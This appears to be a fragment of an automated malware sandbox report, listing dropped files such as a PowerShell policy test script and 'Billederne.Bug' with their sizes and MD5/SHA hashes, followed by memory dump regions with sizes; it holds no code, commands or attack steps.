1d220c43f8f9b11f2ce74beb3e885573459b0ecbe1be56df265385b467845bbb0b93a9a08ce9462307469cf67b37771828e427728030f5b0cadfeb240b70b785

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_za04rbcu.5zk.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Billederne.Bug

Filesize
431KB

MD5
7f86b11c9f5340017cdc480cf40a748b

SHA1
622500c5672351d74f8891ee4140fc35e3ee6402

SHA256
1c0f7064542f985cea9c6e1a4229e2fb6899ae75ef5c0affac3a036760726b5b

SHA512
05dcc78199935a0e719ff4d19bd9e59caef6524ddca9bb830fa26a5fc2dacc4d124bdc57c38bbc8569d63494ef2527b4277022309fe6fd4881c59b1764e825a4

Download Submit
memory/544-387-0x0000000000CB0000-0x0000000000CEF000-memory.dmp

Filesize
252KB

Download
memory/544-389-0x0000000000CB0000-0x0000000000CEF000-memory.dmp

Filesize
252KB

Download
memory/676-336-0x00007FFCCB8F0000-0x00007FFCCC3B1000-memory.dmp

Filesize
10.8MB

Download
memory/676-337-0x00007FFCCB8F0000-0x00007FFCCC3B1000-memory.dmp

Filesize
10.8MB

Download
memory/676-326-0x000001D9E6520000-0x000001D9E6542000-memory.dmp

Filesize
136KB

Download
memory/676-325-0x00007FFCCB8F3000-0x00007FFCCB8F5000-memory.dmp

Filesize
8KB

Download
memory/676-382-0x00007FFCCB8F0000-0x00007FFCCC3B1000-memory.dmp

Filesize
10.8MB

Download
memory/676-365-0x00007FFCCB8F0000-0x00007FFCCC3B1000-memory.dmp

Filesize
10.8MB

Download
memory/676-364-0x00007FFCCB8F3000-0x00007FFCCB8F5000-memory.dmp

Filesize
8KB

Download
memory/1288-397-0x0000024A31130000-0x0000024A3121B000-memory.dmp

Filesize
940KB

Download
memory/2576-388-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/2576-384-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/2576-383-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/2576-379-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/3424-390-0x0000000007DF0000-0x0000000007F05000-memory.dmp

Filesize
1.1MB

Download
memory/3828-342-0x0000000005FD0000-0x0000000005FF2000-memory.dmp

Filesize
136KB

Download
memory/3828-361-0x0000000008840000-0x0000000008DE4000-memory.dmp

Filesize
5.6MB

Download
memory/3828-363-0x0000000008DF0000-0x000000000A87F000-memory.dmp

Filesize
26.6MB

Download
memory/3828-360-0x0000000007A80000-0x0000000007AA2000-memory.dmp

Filesize
136KB

Download
memory/3828-359-0x0000000007B40000-0x0000000007BD6000-memory.dmp

Filesize
600KB

Download
memory/3828-358-0x0000000007960000-0x000000000797A000-memory.dmp

Filesize
104KB

Download
memory/3828-357-0x00000000081C0000-0x000000000883A000-memory.dmp

Filesize
6.5MB

Download
memory/3828-356-0x0000000006870000-0x00000000068BC000-memory.dmp

Filesize
304KB

Download
memory/3828-355-0x0000000006830000-0x000000000684E000-memory.dmp

Filesize
120KB

Download
memory/3828-354-0x0000000006350000-0x00000000066A4000-memory.dmp

Filesize
3.3MB

Download
memory/3828-344-0x00000000061E0000-0x0000000006246000-memory.dmp

Filesize
408KB

Download
memory/3828-343-0x0000000006170000-0x00000000061D6000-memory.dmp

Filesize
408KB

Download
memory/3828-341-0x0000000005970000-0x0000000005F98000-memory.dmp

Filesize
6.2MB

Download
memory/3828-340-0x0000000005280000-0x00000000052B6000-memory.dmp

Filesize
216KB

Download